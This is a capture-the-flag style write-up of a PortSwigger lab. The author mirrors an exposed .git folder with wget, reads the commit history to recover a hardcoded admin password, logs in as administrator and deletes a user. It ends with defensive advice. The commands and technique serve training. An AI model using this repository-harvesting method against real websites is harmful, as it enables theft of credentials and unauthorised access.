Skip to main content

🗂️PortSwigger Lab Writeup: Information Disclosure in Version Control History

PortSwigger lab description page for Info Disclosure via Git

🎯 Objective

The objective of this lab is to discover an information disclosure vulnerability in a web application where it has exposed .git folder publicly in production , and our goal is to recover secrets from the repository (the admin password), use them to log in as administrator, and delete the user carlos.

  • Lab URL: https://portswigger.net/web-security/information-disclosure/exploiting/lab-infoleak-in-version-control-history
  • Category: Information Disclosure
  • Difficulty: Practitioner

🧪 Exploitation Steps

🕵️Step 1: Observe the Website

  • Firstly open the lab URL in your browser, and observe what it is about and how it works. Lab instance showing Shopping website interface
    Login page of the lab instance
  • At first glance, the website seems to be a shopping website with a login page. In the lab description, it is mentioned that there is a .git folder and we need to access it.

🧰Step 2: Accessing Git folder

  • For accessing .git folder, let's try opening /.git/ page. Screenshot of the /.git/ directory accessible in the browser
  • Hence, we successfully identified that there is a publicly exposed .git folder.
  • Now, we will download the git folder into our system using wget and inspect the repo locally with git commands. 
    wget -r  https://0a0f0068035543e8d1a31241009800f3.web-security-academy.net/.git/
  • Now move in to the folder where you downloaded the .git folder
  • Check what commits it contains using the following command. 
    └─$ git log 
    commit 3a60c4b4d982498f44bacf9cd5e3a5d722e48624 (HEAD -> master)
    Author: Carlos Montoya <carlos@carlos-montoya.net>
    Date:   Tue Jun 23 14:05:07 2020 +0000

        Remove admin password from config

    commit 553186c28dbd199fbcef0004af4c0490d00c6896
    Author: Carlos Montoya <carlos@carlos-montoya.net>
    Date:   Mon Jun 22 16:23:42 2020 +0000

        Add skeleton admin panel
  • Now, we can see that there is a commit with description - Remove admin password from config. Let's see this commit what changes are in it. 
    └─$ git show 3a60c4b4d982498f44bacf9cd5e3a5d722e48624
    commit 3a60c4b4d982498f44bacf9cd5e3a5d722e48624 (HEAD -> master)
    Author: Carlos Montoya <carlos@carlos-montoya.net>
    Date:   Tue Jun 23 14:05:07 2020 +0000

        Remove admin password from config

    diff --git a/admin.conf b/admin.conf
    index ad1ca22..21d23f1 100644
    --- a/admin.conf
    +++ b/admin.conf
    @@ -1 +1 @@
    -ADMIN_PASSWORD=ddgh8u5d2wezel6bp519
    +ADMIN_PASSWORD=env('ADMIN_PASSWORD')
  • Hence, we successfully retrieved the administrator password hardcoded in source code from exposed git folder.

🚀Step 3: Delete carlos

  • Now, copy the password of administrator we extracted from git commits and log in as administrator Screenshot of the administrator login page with the extracted password
    Screenshot of logged in administrator account with Admin Panel option
  • Move onto the Admin Panel and delete the user carlos to complete the lab. PortSwigger Lab solved confirmation banner after deleting carlos
  • And Finally, the Lab is solved.

🧠 Conclusion

  • This lab showed how an exposed .git repository can leak sensitive information: by downloading the .git folder and inspecting commits we recovered the hardcoded ADMIN_PASSWORD, used it to log in as administrator, and deleted carlos.
  • Such leaks have a severe impact - attackers can retrieve source code, credentials, API keys, and history of secret removals, then pivot to full system compromise.
  • This highlighting the importance of removing .git from webroot, disable directory listing, never commit secrets (use env vars / a secrets manager), and rotate any credentials if they were exposed.